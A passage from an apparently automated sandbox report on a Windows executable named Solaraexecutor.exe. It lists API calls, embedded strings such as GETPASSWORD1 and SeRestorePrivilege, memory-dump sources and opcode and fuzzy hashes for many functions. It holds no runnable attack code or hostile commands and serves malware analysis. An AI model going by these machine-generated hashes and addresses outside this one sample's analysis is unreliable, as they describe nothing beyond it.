                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer$_abort
                                                      • String ID:
                                                      • API String ID: 2252061734-0
                                                      • Opcode ID: 48feac2b3e50835a18178788e0b7cc0db26357a5980e00be422cdb7df290552b
                                                      • Instruction ID: be3a33bc10b82719cc4ea3ff73ca40f4de0b74e967841e632fa4084ee5ee335c
                                                      • Opcode Fuzzy Hash: 48feac2b3e50835a18178788e0b7cc0db26357a5980e00be422cdb7df290552b
                                                      • Instruction Fuzzy Hash: 7351D472A00212AFDB298F14D885BBAB7A4FF54311F68452DFD41976A1D731ED80D7B0
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00D4BF39
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4BF5C
                                                        • Part of subcall function 00D48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D4BF82
                                                      • _free.LIBCMT ref: 00D4BF95
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4BFA4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: e1e73b07f124c179ff652dbeb0b278fb4bb6b0a5b6e76a8e1ee10728db618515
                                                      • Instruction ID: 3fd3639ea5b9b286d166d810a415338f2c655b987eedc428329aeae8c853ebc0
                                                      • Opcode Fuzzy Hash: e1e73b07f124c179ff652dbeb0b278fb4bb6b0a5b6e76a8e1ee10728db618515
                                                      • Instruction Fuzzy Hash: ED01A2726057157F27211ABA5C8DC7F6A6DEED6BF1318012AFD08D3241EF62CD0699B0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00D491AD,00D4B188,?,00D49813,00000001,00000364,?,00D43F73,00000050,?,00D61030,00000200), ref: 00D4986E
                                                      • _free.LIBCMT ref: 00D498A3
                                                      • _free.LIBCMT ref: 00D498CA
                                                      • SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D498D7
                                                      • SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D498E0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 66ce6a6ecd6b25ff714cffb50e982333303d4f0396efeabd6a361886f72b8410
                                                      • Instruction ID: 1097be44c584fda74f750682bb809953411627f6e9f8df417065444f1664ceb9
                                                      • Opcode Fuzzy Hash: 66ce6a6ecd6b25ff714cffb50e982333303d4f0396efeabd6a361886f72b8410
                                                      • Instruction Fuzzy Hash: 4501F4362857016BC312776E6CA992BA62ADBD27B27250235F915E2292EF20CD015275
                                                      APIs
                                                        • Part of subcall function 00D311CF: ResetEvent.KERNEL32(?), ref: 00D311E1
                                                        • Part of subcall function 00D311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D311F5
                                                      • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D30F21
                                                      • CloseHandle.KERNEL32(?,?), ref: 00D30F3B
                                                      • DeleteCriticalSection.KERNEL32(?), ref: 00D30F54
                                                      • CloseHandle.KERNEL32(?), ref: 00D30F60
                                                      • CloseHandle.KERNEL32(?), ref: 00D30F6C
                                                        • Part of subcall function 00D30FE4: WaitForSingleObject.KERNEL32(?,000000FF,00D31206,?), ref: 00D30FEA
                                                        • Part of subcall function 00D30FE4: GetLastError.KERNEL32(?), ref: 00D30FF6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                      • String ID:
                                                      • API String ID: 1868215902-0
                                                      • Opcode ID: e203f4925fa2bd0045607e44fbacd3807fe4e672b4901b66d99d12bba692c4fa
                                                      • Instruction ID: ec209d7471df7effdbcef58fa50ee3f60649d756cfd692becf93033761bf5157
                                                      • Opcode Fuzzy Hash: e203f4925fa2bd0045607e44fbacd3807fe4e672b4901b66d99d12bba692c4fa
                                                      • Instruction Fuzzy Hash: 3A015271100744EFC7229F68DC84BC6BBA9FF08751F000929F65A921A0C7757A54CB70
                                                      APIs
                                                      • _free.LIBCMT ref: 00D4C817
                                                        • Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
                                                        • Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4
                                                      • _free.LIBCMT ref: 00D4C829
                                                      • _free.LIBCMT ref: 00D4C83B
                                                      • _free.LIBCMT ref: 00D4C84D
                                                      • _free.LIBCMT ref: 00D4C85F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 57d2f5adaa75350efe9676c7a9981db1dbe5e98396162817b4795ce26813f4d2
                                                      • Instruction ID: 6a1b08b122c1f5738800a160e1da4c057bd9a8769349792abf34605d72692b60
                                                      • Opcode Fuzzy Hash: 57d2f5adaa75350efe9676c7a9981db1dbe5e98396162817b4795ce26813f4d2
                                                      • Instruction Fuzzy Hash: F2F06D72922300AF8664EB69E98AC0A73E9EB107517AC2819F508D7652CF70FC80CA74
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00D31FE5
                                                      • _wcslen.LIBCMT ref: 00D31FF6
                                                      • _wcslen.LIBCMT ref: 00D32006
                                                      • _wcslen.LIBCMT ref: 00D32014
                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00D2B371,?,?,00000000,?,?,?), ref: 00D3202F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$CompareString
                                                      • String ID:
                                                      • API String ID: 3397213944-0
                                                      • Opcode ID: 03f8f5817c8ed61cda6b35c45a7f4396a56b23d555b640fc751d786c67e2100f
                                                      • Instruction ID: 73ac1e29844bdc4b53096b3e0630d8cfb830540e28fe46882d332888805f59de
                                                      • Opcode Fuzzy Hash: 03f8f5817c8ed61cda6b35c45a7f4396a56b23d555b640fc751d786c67e2100f
                                                      • Instruction Fuzzy Hash: A9F06D32008114BBCF261F58EC09D8E3F26EB40770F118015FA5A5A061CB72D665D6B0
                                                      APIs
                                                      • _free.LIBCMT ref: 00D4891E
                                                        • Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
                                                        • Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4
                                                      • _free.LIBCMT ref: 00D48930
                                                      • _free.LIBCMT ref: 00D48943
                                                      • _free.LIBCMT ref: 00D48954
                                                      • _free.LIBCMT ref: 00D48965
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: e2c38c95dddda925a0314c69d571b4a19ba62d6766b73055733c395e72f133bc
                                                      • Instruction ID: 867756885e03cce0f9e099ca0e685bfed8bebfa6be3842a545c328af74b60eae
                                                      • Opcode Fuzzy Hash: e2c38c95dddda925a0314c69d571b4a19ba62d6766b73055733c395e72f133bc
                                                      • Instruction Fuzzy Hash: E7F0DA718317229F864A7F14FC0352D3BA1FB247653050506F914D73B1DB324A41AFB5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _swprintf
                                                      • String ID: %ls$%s: %s
                                                      • API String ID: 589789837-2259941744
                                                      • Opcode ID: d37c11979df6adcc55d8a12153ab38eed4a55fa7d1902374445e5d85f89678c3
                                                      • Instruction ID: 3ed11e8118dc898342fdc70b0b3d970708ec80a6b95b198e97ae38abc9adebbb
                                                      • Opcode Fuzzy Hash: d37c11979df6adcc55d8a12153ab38eed4a55fa7d1902374445e5d85f89678c3
                                                      • Instruction Fuzzy Hash: 7D51FB7D288302F6F6211AD48D47F357765EB15B05F288A06F7C6684E1C9E2E460A73F
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe,00000104), ref: 00D47FAE
                                                      • _free.LIBCMT ref: 00D48079
                                                      • _free.LIBCMT ref: 00D48083
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
                                                      • API String ID: 2506810119-1981919265
                                                      • Opcode ID: 187b04bc8a1fdfe2f94298c5a08fa5ef32b856ffb3ec75be5e7aa194f2a7a4b5
                                                      • Instruction ID: b8cadfa979dc513811285baf78f1116f481d343d26627265e2aebd7a892531ba
                                                      • Opcode Fuzzy Hash: 187b04bc8a1fdfe2f94298c5a08fa5ef32b856ffb3ec75be5e7aa194f2a7a4b5
                                                      • Instruction Fuzzy Hash: 1131AEB1A10318AFDB21DF99D8819AEBBFCEF95350F14406AF90497211DB718E44DB71
                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D431FB
                                                      • _abort.LIBCMT ref: 00D43306
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer_abort
                                                      • String ID: MOC$RCC
                                                      • API String ID: 948111806-2084237596
                                                      • Opcode ID: 37c4bc4bb827792e23c3dfa5b3e6c2dddaf7b8c3210c554bbea1d1cb9f0cf92e
                                                      • Instruction ID: cef9720ad1ec01abae2e266fa6ec05a9305dfd59a0df6bf721edaef23d484b7b
                                                      • Opcode Fuzzy Hash: 37c4bc4bb827792e23c3dfa5b3e6c2dddaf7b8c3210c554bbea1d1cb9f0cf92e
                                                      • Instruction Fuzzy Hash: C4415871900209AFCF15DF98CD82AEEBBB5FF48304F188159F904A7226D375EA50DB64
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D27406
                                                        • Part of subcall function 00D23BBA: __EH_prolog.LIBCMT ref: 00D23BBF
                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D274CD
                                                        • Part of subcall function 00D27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D27AAB
                                                        • Part of subcall function 00D27A9C: GetLastError.KERNEL32 ref: 00D27AF1
                                                        • Part of subcall function 00D27A9C: CloseHandle.KERNEL32(?), ref: 00D27B00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                      • API String ID: 3813983858-639343689
                                                      • Opcode ID: 47c2f8881c8beada76517bddde2696886badbca9e79a93972793b19ad94ebf05
                                                      • Instruction ID: 342de607da754c996bff3511a8a976e8a0d45601ea0a2b73e9306d1b4fa9d67e
                                                      • Opcode Fuzzy Hash: 47c2f8881c8beada76517bddde2696886badbca9e79a93972793b19ad94ebf05
                                                      • Instruction Fuzzy Hash: F031A371D04368AADF21EBA4EC45BEEBBB9EF29308F084015F805E7281D7748A48C770
                                                      APIs
                                                        • Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
                                                        • Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370
                                                      • EndDialog.USER32(?,00000001), ref: 00D3AD98
                                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D3ADAD
                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D3ADC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ItemText$DialogWindow
                                                      • String ID: ASKNEXTVOL
                                                      • API String ID: 445417207-3402441367
                                                      • Opcode ID: 487eb83fb289e45c742f80250c073c2c81443acc0684692480b26c5192108597
                                                      • Instruction ID: a716cd1de72a0ef60fe1016d23d04dc60cf7e4907894c7831e674a60479c68bf
                                                      • Opcode Fuzzy Hash: 487eb83fb289e45c742f80250c073c2c81443acc0684692480b26c5192108597
                                                      • Instruction Fuzzy Hash: 1C11D332390310AFD7118F6CFC05F6A7769EF5A702F050000F2C0DB6A0DB6199199732
                                                      APIs
                                                      • __fprintf_l.LIBCMT ref: 00D2D954
                                                      • _strncpy.LIBCMT ref: 00D2D99A
                                                        • Part of subcall function 00D31DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D61030,00000200,00D2D928,00000000,?,00000050,00D61030), ref: 00D31DC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                      • String ID: $%s$@%s
                                                      • API String ID: 562999700-834177443
                                                      • Opcode ID: 1ad9855241743f58e1d2513598bc88d6b73d1e5a4552ce00a0e26ccc30ca943f
                                                      • Instruction ID: 8836009e910e1fc651749ad1b343c06e602d99af44b7ffb29fa705ffbb3d8c18
                                                      • Opcode Fuzzy Hash: 1ad9855241743f58e1d2513598bc88d6b73d1e5a4552ce00a0e26ccc30ca943f
                                                      • Instruction Fuzzy Hash: FB219D32440258AEEF21EEA4DC05FEE7BA9EF15348F040422FD51961A2E272D6888F71
                                                      APIs
                                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D2AC5A,00000008,?,00000000,?,00D2D22D,?,00000000), ref: 00D30E85
                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D2AC5A,00000008,?,00000000,?,00D2D22D,?,00000000), ref: 00D30E8F
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D2AC5A,00000008,?,00000000,?,00D2D22D,?,00000000), ref: 00D30E9F
                                                      Strings
                                                      • Thread pool initialization failed., xrefs: 00D30EB7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                      • String ID: Thread pool initialization failed.
                                                      • API String ID: 3340455307-2182114853
                                                      • Opcode ID: c6f95b415a5366a50cc7af1580fb4ee96c3449f9868d6a501347ea798a399951
                                                      • Instruction ID: 8f279b51c931a59c65ad0831079ec84067e5b4e934a79563ec6a65f14d804448
                                                      • Opcode Fuzzy Hash: c6f95b415a5366a50cc7af1580fb4ee96c3449f9868d6a501347ea798a399951
                                                      • Instruction Fuzzy Hash: 49119EB17407089FC3215F6A9C84AA7FFECEB68794F144C2EF5DAC2200D6B199409B70
                                                      APIs
                                                        • Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
                                                        • Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370
                                                      • EndDialog.USER32(?,00000001), ref: 00D3B2BE
                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D3B2D6
                                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D3B304
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ItemText$DialogWindow
                                                      • String ID: GETPASSWORD1
                                                      • API String ID: 445417207-3292211884
                                                      • Opcode ID: 9b58bffb8d5955ac351dfed865e7cfcc095d9c1ad0919d3d4b5e24e454681bf2
                                                      • Instruction ID: 5feee5be4cd8cf116343959f95753f1f1f89886bef95fb446e8d7870facb5f33
                                                      • Opcode Fuzzy Hash: 9b58bffb8d5955ac351dfed865e7cfcc095d9c1ad0919d3d4b5e24e454681bf2
                                                      • Instruction Fuzzy Hash: 2E11A536900228BADB119B64AC49FFF376CEB59724F140522FB86F6180C7A0D94597B5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
